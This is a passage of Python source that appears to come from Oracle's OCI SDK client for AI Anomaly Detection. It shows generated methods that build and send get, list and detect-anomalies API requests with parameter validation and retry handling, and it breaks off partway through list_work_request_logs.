        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/detect_anomalies.py.html>`__ to see an example of how to use detect_anomalies API.
    """
    resource_path = "/actions/detectAnomalies"
    method = "POST"

    # Reject any keyword argument this operation does not support.
    allowed_kwargs = ("retry_strategy", "opc_request_id", "if_match", "opc_retry_token")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "detect_anomalies got unknown kwargs: {!r}".format(unknown))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "if-match": kwargs.get("if_match", missing),
        "opc-retry-token": kwargs.get("opc_retry_token", missing)
    }
    # Strip headers the caller did not supply.
    header_params = {
        name: value for (name, value) in six.iteritems(header_params)
        if value is not missing and value is not None
    }

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No strategy configured anywhere: issue a single, plain call.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            header_params=header_params,
            body=detect_anomalies_details,
            response_type="AnomalyDetectResult")

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Real retries: make the POST idempotent and advertise client retries.
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        header_params=header_params,
        body=detect_anomalies_details,
        response_type="AnomalyDetectResult")
def get_ai_private_endpoint(self, ai_private_endpoint_id, **kwargs):
    """
    Gets a specific private reverse connection by identifier.

    :param str ai_private_endpoint_id: (required)
        Unique private reverse connection identifier.

    :param str opc_request_id: (optional)
        The client request ID for tracing.

    :param obj retry_strategy: (optional)
        A retry strategy for this specific call, overriding any strategy set
        at the client level. Must be one of the strategies in the
        :py:mod:`~oci.retry` module. The operation does not retry by
        default; pass :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` to enable
        retries, or an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable them.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.AiPrivateEndpoint`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/get_ai_private_endpoint.py.html>`__ to see an example of how to use get_ai_private_endpoint API.
    """
    resource_path = "/aiPrivateEndpoints/{aiPrivateEndpointId}"
    method = "GET"

    # Reject any keyword argument this operation does not support.
    allowed_kwargs = ("retry_strategy", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "get_ai_private_endpoint got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "aiPrivateEndpointId": ai_private_endpoint_id
    }
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}

    # Path parameters may never be None, empty, or whitespace-only.
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Strip headers the caller did not supply.
    header_params = {
        name: value for (name, value) in six.iteritems(header_params)
        if value is not missing and value is not None
    }

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No strategy configured anywhere: issue a single, plain call.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params,
            response_type="AiPrivateEndpoint")

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        response_type="AiPrivateEndpoint")
def get_data_asset(self, data_asset_id, **kwargs):
    """
    Gets a DataAsset by identifier

    :param str data_asset_id: (required)
        The OCID of the Data Asset.

    :param str opc_request_id: (optional)
        The client request ID for tracing.

    :param obj retry_strategy: (optional)
        A retry strategy for this specific call, overriding any strategy set
        at the client level. Must be one of the strategies in the
        :py:mod:`~oci.retry` module. The operation does not retry by
        default; pass :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` to enable
        retries, or an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable them.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.DataAsset`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/get_data_asset.py.html>`__ to see an example of how to use get_data_asset API.
    """
    resource_path = "/dataAssets/{dataAssetId}"
    method = "GET"

    # Reject any keyword argument this operation does not support.
    allowed_kwargs = ("retry_strategy", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "get_data_asset got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "dataAssetId": data_asset_id
    }
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}

    # Path parameters may never be None, empty, or whitespace-only.
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Strip headers the caller did not supply.
    header_params = {
        name: value for (name, value) in six.iteritems(header_params)
        if value is not missing and value is not None
    }

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No strategy configured anywhere: issue a single, plain call.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params,
            response_type="DataAsset")

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        response_type="DataAsset")
def get_model(self, model_id, **kwargs):
    """
    Gets a Model by identifier.

    :param str model_id: (required)
        The OCID of the Model to fetch.
    :param str opc_request_id: (optional)
        The client request ID for tracing.
    :param obj retry_strategy: (optional)
        A retry strategy for this specific call; overrides any client-level
        strategy. Pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type
        :class:`~oci.ai_anomaly_detection.models.Model`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/models/{modelId}"
    method = "GET"

    # Reject any keyword arguments this operation does not understand.
    allowed_kwargs = [
        "retry_strategy",
        "opc_request_id"
    ]
    unexpected = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unexpected:
        raise ValueError(
            "get_model got unknown kwargs: {!r}".format(unexpected))

    path_params = {
        "modelId": model_id
    }
    path_params = {name: value for (name, value) in six.iteritems(path_params) if value is not missing}

    # Path parameters must be present and non-blank; an empty segment would
    # produce a malformed request URL.
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {name: value for (name, value) in six.iteritems(header_params) if value is not missing and value is not None}

    chosen_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Without a retry strategy, issue the request directly.
    if not chosen_strategy:
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params,
            response_type="Model")

    if not isinstance(chosen_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        chosen_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return chosen_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        response_type="Model")
def get_project(self, project_id, **kwargs):
    """
    Gets a Project by identifier.

    :param str project_id: (required)
        The OCID of the Project to fetch.
    :param str opc_request_id: (optional)
        The client request ID for tracing.
    :param obj retry_strategy: (optional)
        A retry strategy for this specific call; overrides any client-level
        strategy. Pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type
        :class:`~oci.ai_anomaly_detection.models.Project`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/projects/{projectId}"
    method = "GET"

    # Reject any keyword arguments this operation does not understand.
    allowed_kwargs = [
        "retry_strategy",
        "opc_request_id"
    ]
    unexpected = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unexpected:
        raise ValueError(
            "get_project got unknown kwargs: {!r}".format(unexpected))

    path_params = {
        "projectId": project_id
    }
    path_params = {name: value for (name, value) in six.iteritems(path_params) if value is not missing}

    # Path parameters must be present and non-blank; an empty segment would
    # produce a malformed request URL.
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {name: value for (name, value) in six.iteritems(header_params) if value is not missing and value is not None}

    chosen_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Without a retry strategy, issue the request directly.
    if not chosen_strategy:
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params,
            response_type="Project")

    if not isinstance(chosen_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        chosen_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return chosen_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        response_type="Project")
def get_work_request(self, work_request_id, **kwargs):
    """
    Gets the status of the work request with the given ID.

    :param str work_request_id: (required)
        The ID of the asynchronous request.
    :param str opc_request_id: (optional)
        The client request ID for tracing.
    :param obj retry_strategy: (optional)
        A retry strategy for this specific call; overrides any client-level
        strategy. Pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type
        :class:`~oci.ai_anomaly_detection.models.WorkRequest`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/workRequests/{workRequestId}"
    method = "GET"

    # Reject any keyword arguments this operation does not understand.
    allowed_kwargs = [
        "retry_strategy",
        "opc_request_id"
    ]
    unexpected = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unexpected:
        raise ValueError(
            "get_work_request got unknown kwargs: {!r}".format(unexpected))

    path_params = {
        "workRequestId": work_request_id
    }
    path_params = {name: value for (name, value) in six.iteritems(path_params) if value is not missing}

    # Path parameters must be present and non-blank; an empty segment would
    # produce a malformed request URL.
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {name: value for (name, value) in six.iteritems(header_params) if value is not missing and value is not None}

    chosen_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Without a retry strategy, issue the request directly.
    if not chosen_strategy:
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params,
            response_type="WorkRequest")

    if not isinstance(chosen_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        chosen_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return chosen_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        response_type="WorkRequest")
def list_ai_private_endpoints(self, compartment_id, **kwargs):
    """
    Returns a list of all the AI private endpoints in the specified compartment.

    :param str compartment_id: (required)
        The ID of the compartment in which to list resources.
    :param str lifecycle_state: (optional)
        Filter results by lifecycle state. Allowed values are:
        "CREATING", "UPDATING", "ACTIVE", "DELETING", "DELETED", "FAILED"
    :param str display_name: (optional)
        Return only resources matching the entire display name.
    :param str id: (optional)
        Unique AiPrivateEndpoint identifier.
    :param int limit: (optional)
        The maximum number of items to return.
    :param str page: (optional)
        The page token at which to start retrieving results.
    :param str sort_order: (optional)
        Either "ASC" or "DESC".
    :param str sort_by: (optional)
        Field to sort by; one of "timeCreated" (default, descending) or
        "displayName" (ascending).
    :param str opc_request_id: (optional)
        The client request ID for tracing.
    :param obj retry_strategy: (optional)
        A retry strategy for this specific call; overrides any client-level
        strategy. Pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type
        :class:`~oci.ai_anomaly_detection.models.AiPrivateEndpointCollection`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/aiPrivateEndpoints"
    method = "GET"

    # Reject any keyword arguments this operation does not understand.
    allowed_kwargs = [
        "retry_strategy",
        "lifecycle_state",
        "display_name",
        "id",
        "limit",
        "page",
        "sort_order",
        "sort_by",
        "opc_request_id"
    ]
    unexpected = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unexpected:
        raise ValueError(
            "list_ai_private_endpoints got unknown kwargs: {!r}".format(unexpected))

    def _check_enum(name, allowed_values):
        # Enum-style kwargs may only take one of the documented values.
        if name in kwargs and kwargs[name] not in allowed_values:
            raise ValueError(
                "Invalid value for `{}`, must be one of {}".format(name, allowed_values)
            )

    _check_enum('lifecycle_state', ["CREATING", "UPDATING", "ACTIVE", "DELETING", "DELETED", "FAILED"])
    _check_enum('sort_order', ["ASC", "DESC"])
    _check_enum('sort_by', ["timeCreated", "displayName"])

    query_params = {
        "compartmentId": compartment_id,
        "lifecycleState": kwargs.get("lifecycle_state", missing),
        "displayName": kwargs.get("display_name", missing),
        "id": kwargs.get("id", missing),
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "sortOrder": kwargs.get("sort_order", missing),
        "sortBy": kwargs.get("sort_by", missing)
    }
    query_params = {name: value for (name, value) in six.iteritems(query_params) if value is not missing and value is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {name: value for (name, value) in six.iteritems(header_params) if value is not missing and value is not None}

    chosen_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Without a retry strategy, issue the request directly.
    if not chosen_strategy:
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            query_params=query_params,
            header_params=header_params,
            response_type="AiPrivateEndpointCollection")

    if not isinstance(chosen_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        chosen_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return chosen_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        query_params=query_params,
        header_params=header_params,
        response_type="AiPrivateEndpointCollection")
def list_data_assets(self, compartment_id, **kwargs):
    """
    Returns a list of DataAssets.

    :param str compartment_id: (required)
        The ID of the compartment in which to list resources.
    :param str project_id: (optional)
        The ID of the project for which to list the objects.
    :param str display_name: (optional)
        Return only resources matching the entire display name.
    :param int limit: (optional)
        The maximum number of items to return.
    :param str page: (optional)
        The page token at which to start retrieving results.
    :param str lifecycle_state: (optional)
        Filter results by lifecycle state. Allowed values are:
        "ACTIVE", "DELETED"
    :param str sort_order: (optional)
        Either "ASC" or "DESC".
    :param str sort_by: (optional)
        Field to sort by; one of "timeCreated" (default, descending) or
        "displayName" (ascending).
    :param str opc_request_id: (optional)
        The client request ID for tracing.
    :param obj retry_strategy: (optional)
        A retry strategy for this specific call; overrides any client-level
        strategy. Pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type
        :class:`~oci.ai_anomaly_detection.models.DataAssetCollection`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/dataAssets"
    method = "GET"

    # Reject any keyword arguments this operation does not understand.
    allowed_kwargs = [
        "retry_strategy",
        "project_id",
        "display_name",
        "limit",
        "page",
        "lifecycle_state",
        "sort_order",
        "sort_by",
        "opc_request_id"
    ]
    unexpected = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unexpected:
        raise ValueError(
            "list_data_assets got unknown kwargs: {!r}".format(unexpected))

    def _check_enum(name, allowed_values):
        # Enum-style kwargs may only take one of the documented values.
        if name in kwargs and kwargs[name] not in allowed_values:
            raise ValueError(
                "Invalid value for `{}`, must be one of {}".format(name, allowed_values)
            )

    _check_enum('lifecycle_state', ["ACTIVE", "DELETED"])
    _check_enum('sort_order', ["ASC", "DESC"])
    _check_enum('sort_by', ["timeCreated", "displayName"])

    query_params = {
        "compartmentId": compartment_id,
        "projectId": kwargs.get("project_id", missing),
        "displayName": kwargs.get("display_name", missing),
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "lifecycleState": kwargs.get("lifecycle_state", missing),
        "sortOrder": kwargs.get("sort_order", missing),
        "sortBy": kwargs.get("sort_by", missing)
    }
    query_params = {name: value for (name, value) in six.iteritems(query_params) if value is not missing and value is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {name: value for (name, value) in six.iteritems(header_params) if value is not missing and value is not None}

    chosen_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Without a retry strategy, issue the request directly.
    if not chosen_strategy:
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            query_params=query_params,
            header_params=header_params,
            response_type="DataAssetCollection")

    if not isinstance(chosen_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        chosen_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return chosen_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        query_params=query_params,
        header_params=header_params,
        response_type="DataAssetCollection")
def list_models(self, compartment_id, **kwargs):
    """
    Returns a list of Models.

    :param str compartment_id: (required)
        The ID of the compartment in which to list resources.
    :param str project_id: (optional)
        The ID of the project for which to list the objects.
    :param str lifecycle_state: (optional)
        Filter results by lifecycle state. Allowed values are:
        "DELETING", "DELETED", "FAILED", "CREATING", "ACTIVE", "UPDATING"
    :param str display_name: (optional)
        Return only resources matching the entire display name.
    :param int limit: (optional)
        The maximum number of items to return.
    :param str page: (optional)
        The page token at which to start retrieving results.
    :param str sort_order: (optional)
        Either "ASC" or "DESC".
    :param str sort_by: (optional)
        Field to sort by; one of "timeCreated" (default, descending) or
        "displayName" (ascending, case sensitive).
    :param str opc_request_id: (optional)
        The client request ID for tracing.
    :param obj retry_strategy: (optional)
        A retry strategy for this specific call; overrides any client-level
        strategy. Pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type
        :class:`~oci.ai_anomaly_detection.models.ModelCollection`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/models"
    method = "GET"

    # Reject any keyword arguments this operation does not understand.
    allowed_kwargs = [
        "retry_strategy",
        "project_id",
        "lifecycle_state",
        "display_name",
        "limit",
        "page",
        "sort_order",
        "sort_by",
        "opc_request_id"
    ]
    unexpected = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unexpected:
        raise ValueError(
            "list_models got unknown kwargs: {!r}".format(unexpected))

    def _check_enum(name, allowed_values):
        # Enum-style kwargs may only take one of the documented values.
        if name in kwargs and kwargs[name] not in allowed_values:
            raise ValueError(
                "Invalid value for `{}`, must be one of {}".format(name, allowed_values)
            )

    _check_enum('lifecycle_state', ["DELETING", "DELETED", "FAILED", "CREATING", "ACTIVE", "UPDATING"])
    _check_enum('sort_order', ["ASC", "DESC"])
    _check_enum('sort_by', ["timeCreated", "displayName"])

    query_params = {
        "compartmentId": compartment_id,
        "projectId": kwargs.get("project_id", missing),
        "lifecycleState": kwargs.get("lifecycle_state", missing),
        "displayName": kwargs.get("display_name", missing),
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "sortOrder": kwargs.get("sort_order", missing),
        "sortBy": kwargs.get("sort_by", missing)
    }
    query_params = {name: value for (name, value) in six.iteritems(query_params) if value is not missing and value is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {name: value for (name, value) in six.iteritems(header_params) if value is not missing and value is not None}

    chosen_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Without a retry strategy, issue the request directly.
    if not chosen_strategy:
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            query_params=query_params,
            header_params=header_params,
            response_type="ModelCollection")

    if not isinstance(chosen_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        chosen_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return chosen_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        query_params=query_params,
        header_params=header_params,
        response_type="ModelCollection")
def list_projects(self, compartment_id, **kwargs):
    """
    Returns a list of Projects.

    :param str compartment_id: (required)
        The ID of the compartment in which to list resources.
    :param str lifecycle_state: (optional)
        Filter results by lifecycle state. Allowed values are:
        "ACTIVE", "CREATING", "FAILED", "DELETING", "DELETED", "UPDATING"
    :param str display_name: (optional)
        Return only resources matching the entire display name.
    :param int limit: (optional)
        The maximum number of items to return.
    :param str page: (optional)
        The page token at which to start retrieving results.
    :param str sort_order: (optional)
        Either "ASC" or "DESC".
    :param str sort_by: (optional)
        Field to sort by; one of "timeCreated" (default, descending) or
        "displayName" (ascending, case sensitive).
    :param str opc_request_id: (optional)
        The client request ID for tracing.
    :param obj retry_strategy: (optional)
        A retry strategy for this specific call; overrides any client-level
        strategy. Pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type
        :class:`~oci.ai_anomaly_detection.models.ProjectCollection`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/projects"
    method = "GET"

    # Reject any keyword arguments this operation does not understand.
    allowed_kwargs = [
        "retry_strategy",
        "lifecycle_state",
        "display_name",
        "limit",
        "page",
        "sort_order",
        "sort_by",
        "opc_request_id"
    ]
    unexpected = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unexpected:
        raise ValueError(
            "list_projects got unknown kwargs: {!r}".format(unexpected))

    def _check_enum(name, allowed_values):
        # Enum-style kwargs may only take one of the documented values.
        if name in kwargs and kwargs[name] not in allowed_values:
            raise ValueError(
                "Invalid value for `{}`, must be one of {}".format(name, allowed_values)
            )

    _check_enum('lifecycle_state', ["ACTIVE", "CREATING", "FAILED", "DELETING", "DELETED", "UPDATING"])
    _check_enum('sort_order', ["ASC", "DESC"])
    _check_enum('sort_by', ["timeCreated", "displayName"])

    query_params = {
        "compartmentId": compartment_id,
        "lifecycleState": kwargs.get("lifecycle_state", missing),
        "displayName": kwargs.get("display_name", missing),
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "sortOrder": kwargs.get("sort_order", missing),
        "sortBy": kwargs.get("sort_by", missing)
    }
    query_params = {name: value for (name, value) in six.iteritems(query_params) if value is not missing and value is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {name: value for (name, value) in six.iteritems(header_params) if value is not missing and value is not None}

    chosen_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Without a retry strategy, issue the request directly.
    if not chosen_strategy:
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            query_params=query_params,
            header_params=header_params,
            response_type="ProjectCollection")

    if not isinstance(chosen_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        chosen_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return chosen_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        query_params=query_params,
        header_params=header_params,
        response_type="ProjectCollection")
def list_work_request_errors(self, work_request_id, **kwargs):
    """
    Return a (paginated) list of errors for a given work request.

    :param str work_request_id: (required)
        The ID of the asynchronous request.
    :param str opc_request_id: (optional)
        The client request ID for tracing.
    :param str page: (optional)
        The page token at which to start retrieving results.
    :param int limit: (optional)
        The maximum number of items to return.
    :param obj retry_strategy: (optional)
        A retry strategy for this specific call; overrides any client-level
        strategy. Pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type
        :class:`~oci.ai_anomaly_detection.models.WorkRequestErrorCollection`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/workRequests/{workRequestId}/errors"
    method = "GET"

    # Reject any keyword arguments this operation does not understand.
    allowed_kwargs = [
        "retry_strategy",
        "opc_request_id",
        "page",
        "limit"
    ]
    unexpected = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unexpected:
        raise ValueError(
            "list_work_request_errors got unknown kwargs: {!r}".format(unexpected))

    path_params = {
        "workRequestId": work_request_id
    }
    path_params = {name: value for (name, value) in six.iteritems(path_params) if value is not missing}

    # Path parameters must be present and non-blank; an empty segment would
    # produce a malformed request URL.
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    query_params = {
        "page": kwargs.get("page", missing),
        "limit": kwargs.get("limit", missing)
    }
    query_params = {name: value for (name, value) in six.iteritems(query_params) if value is not missing and value is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {name: value for (name, value) in six.iteritems(header_params) if value is not missing and value is not None}

    chosen_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Without a retry strategy, issue the request directly.
    if not chosen_strategy:
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            query_params=query_params,
            header_params=header_params,
            response_type="WorkRequestErrorCollection")

    if not isinstance(chosen_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        chosen_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return chosen_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        response_type="WorkRequestErrorCollection")
def list_work_request_logs(self, work_request_id, **kwargs):
"""
Return a (paginated) list of logs for a given work request.
:param str work_request_id: (required)
The ID of the asynchronous request.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param str page: (optional)
The page token representing the page at which to start retrieving results. This is usually retrieved from a previous list call.
:param int limit: (optional)
The maximum number of items to return.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.WorkRequestLogEntryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/list_work_request_logs.py.html>`__ to see an example of how to use list_work_request_logs API.
"""
resource_path = "/workRequests/{workRequestId}/logs"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"page",
"limit"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_request_logs got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
